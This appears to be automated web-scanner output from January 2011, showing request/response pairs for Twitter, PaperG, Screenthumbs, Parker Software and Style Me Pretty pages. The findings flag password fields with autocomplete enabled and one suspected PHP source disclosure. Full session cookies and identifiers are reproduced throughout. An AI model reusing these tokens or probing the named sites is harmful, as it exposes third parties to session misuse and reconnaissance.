GET /search HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:17 GMT Server: hi Status: 200 OK X-Transaction: 1296225016-47325-41983 ETag: "98f573cd8faa541b15eed6e89977a1f8" Last-Modified: Fri, 28 Jan 2011 14:30:16 GMT X-Runtime: 0.07569 Content-Type: text/html; charset=utf-8 Content-Length: 19528 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlM2UyNzM1ZTZiZTAyMzMyZmQ2NWQ3MzBlYmU0MWEz%250AODA6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--b3402f9fff3f356babde838d74594264b0e647aa; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /sentience HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:31:17 GMT Server: hi Status: 200 OK X-Transaction: 1296225077-43301-33019 ETag: "6e942a84bdcf3e0bad65268b7ad885b6" Last-Modified: Fri, 28 Jan 2011 14:31:17 GMT X-Runtime: 0.01443 Content-Type: text/html; charset=utf-8 Content-Length: 50391 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /simplemodal HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:29:05 GMT Server: hi Status: 200 OK X-Transaction: 1296224945-98814-3009 ETag: "203a0c353b6f6f89b45f107452b2203c" Last-Modified: Fri, 28 Jan 2011 14:29:05 GMT X-Runtime: 0.02016 Content-Type: text/html; charset=utf-8 Content-Length: 47151 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /sitepointdotcom HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:34 GMT Server: hi Status: 200 OK X-Transaction: 1296225034-62449-28872 ETag: "9ce581b329f6d5870310b5ced0d02fe8" Last-Modified: Fri, 28 Jan 2011 14:30:34 GMT X-Runtime: 0.01185 Content-Type: text/html; charset=utf-8 Content-Length: 53056 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /slaterusa HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:16 GMT Server: hi Status: 200 OK X-Transaction: 1296225016-47321-52923 ETag: "e18f995e42882bc3925d1122528b563b" Last-Modified: Fri, 28 Jan 2011 14:30:16 GMT X-Runtime: 0.01113 Content-Type: text/html; charset=utf-8 Content-Length: 47275 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /stubbornella HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:44 GMT Server: hi Status: 200 OK X-Transaction: 1296225044-17908-9667 ETag: "c8f4f53596f1bb2e5586d7d17efcc5c7" Last-Modified: Fri, 28 Jan 2011 14:30:44 GMT X-Runtime: 0.01178 Content-Type: text/html; charset=utf-8 Content-Length: 53443 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /townsandtrails HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:28 GMT Server: hi Status: 200 OK X-Transaction: 1296225028-55890-31920 ETag: "8cefd1f1479aaa09aab96f1e9191b50f" Last-Modified: Fri, 28 Jan 2011 14:30:28 GMT X-Runtime: 0.01466 Content-Type: text/html; charset=utf-8 Content-Length: 50670 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /travis HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:35 GMT Server: hi Status: 200 OK X-Transaction: 1296225035-81767-49969 ETag: "87ddebc7da76c7d19a026c1d7f912c12" Last-Modified: Fri, 28 Jan 2011 14:30:35 GMT X-Runtime: 0.01393 Content-Type: text/html; charset=utf-8 Content-Length: 56939 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /waynecountylife HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:36 GMT Server: hi Status: 200 OK X-Transaction: 1296225036-43124-3354 ETag: "04a252192aa79528cad7c5c11d3825f3" Last-Modified: Fri, 28 Jan 2011 14:30:36 GMT X-Runtime: 0.35094 Content-Type: text/html; charset=utf-8 Content-Length: 54878 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIidodHRwOi8vdHdpdHRlci5jb20vd2F5bmVjb3Vu%250AdHlsaWZlOgxjc3JmX2lkIiUyZDVjNDY0MjVjZjk4MWU0NDI1ZGZkZWI1OTNl%250ANDIxYzoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--90d7bcbfc68d4b17546f6b6e6696899149d482a7; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /webandy HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:28:39 GMT Server: hi Status: 200 OK X-Transaction: 1296224919-86126-59712 ETag: "072bd7c69249b014a8eea541d0e13ce7" Last-Modified: Fri, 28 Jan 2011 14:28:39 GMT X-Runtime: 0.46070 Content-Type: text/html; charset=utf-8 Content-Length: 51273 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIh9odHRwOi8vdHdpdHRlci5jb20vd2ViYW5keToM%250AY3NyZl9pZCIlMzU4ODlhZDFhNTVmNjY2ODliNTc5MzYzYjlkMzVmNjc6B2lk%250AIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--69ca8ae41a9f970b1732fe7d2a927b6f2859758a; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
http://www.paperg.com/
The form contains the following password field with autocomplete enabled:
pass
Request
GET / HTTP/1.1 Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 17:17:42 GMT Server: Apache/2.2.9 (Debian) X-Powered-By: PHP/5.2.6-1+lenny6 Vary: Accept-Encoding Content-Type: text/html Connection: close Via: 1.1 AN-0016020122637050 Content-Length: 10755
The page contains a form with the following action URL:
https://www.paperg.com/login.php
The form contains the following password field with autocomplete enabled:
pass
Request
GET /post.php?bid=2123&pid=3922&post HTTP/1.1 Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 17:17:46 GMT Server: Apache X-Powered-By: PHP/5.2.17 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <title>PaperG | Post a Flyer</title>
The page contains a form with the following action URL:
https://www.paperg.com/process.php
The form contains the following password fields with autocomplete enabled:
login_password
account_password
account_confirm_password
Request
GET /post.php?bid=2123&pid=3922&post HTTP/1.1 Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 17:17:46 GMT Server: Apache X-Powered-By: PHP/5.2.17 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <title>PaperG | Post a Flyer</title>
<meta http-equiv="Content-Type" co ...[SNIP]... </script>
The form contains the following password field with autocomplete enabled:
password
Request
GET /forum/ HTTP/1.1 Host: www.parker-software.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 13:58:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET pragma: no-cache cache-control: private Content-Length: 21920 Content-Type: text/html Expires: Wed, 26 Jan 2011 13:58:10 GMT Set-Cookie: WWF9lVisit=LV=2011%2D01%2D28+13%3A58%3A10; expires=Sat, 28-Jan-2012 13:58:10 GMT; path=/forum/ Set-Cookie: WWF9sID=SID=629255141c2dfczb44f2d1ea4be92fz9; path=/forum/ Set-Cookie: ASPSESSIONIDCQSCRASQ=CIEMDCNAFMCFHFEFAKMMMFLF; path=/ Cache-control: No-Store
The page contains a form with the following action URL:
http://www.screenthumbs.com/login
The form contains the following password field with autocomplete enabled:
password
Request
GET /about HTTP/1.1 Host: www.screenthumbs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 21:56:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html
The page contains a form with the following action URL:
http://www.screenthumbs.com/login
The form contains the following password field with autocomplete enabled:
password
Request
GET /contact HTTP/1.1 Host: www.screenthumbs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 21:56:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html
The page contains a form with the following action URL:
http://www.screenthumbs.com/login
The form contains the following password field with autocomplete enabled:
password
Request
GET /forgot HTTP/1.1 Host: www.screenthumbs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 21:56:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html
The page contains a form with the following action URL:
http://www.screenthumbs.com/login
The form contains the following password field with autocomplete enabled:
password
Request
GET /linkthumbs HTTP/1.1 Host: www.screenthumbs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 21:56:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html
The page contains a form with the following action URL:
http://www.screenthumbs.com/login
The form contains the following password field with autocomplete enabled:
password
Request
GET /plugins HTTP/1.1 Host: www.screenthumbs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 21:56:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html
The page contains a form with the following action URL:
http://www.screenthumbs.com/login
The form contains the following password field with autocomplete enabled:
password
Request
GET /service HTTP/1.1 Host: www.screenthumbs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 21:56:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html
The page contains a form with the following action URL:
http://www.screenthumbs.com/signup.php
The form contains the following password fields with autocomplete enabled:
password
password2
Request
GET /signup.php HTTP/1.1 Host: www.screenthumbs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 21:56:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html
The page contains a form with the following action URL:
http://circle.stylemepretty.com/wp-login.php
The form contains the following password field with autocomplete enabled:
pwd
Request
GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1 Host: www.stylemepretty.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Fri, 28 Jan 2011 15:06:07 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.16 Vary: Cookie,Accept-Encoding Set-Cookie: wpmp_switcher=desktop; expires=Sat, 28-Jan-2012 15:06:08 GMT; path=/ X-Pingback: http://www.stylemepretty.com/xmlrpc.php X-Mobilized-By: WordPress Mobile Pack 1.2.0 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 28 Jan 2011 15:06:08 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 39718
The application appears to disclose some server-side source code written in PHP.
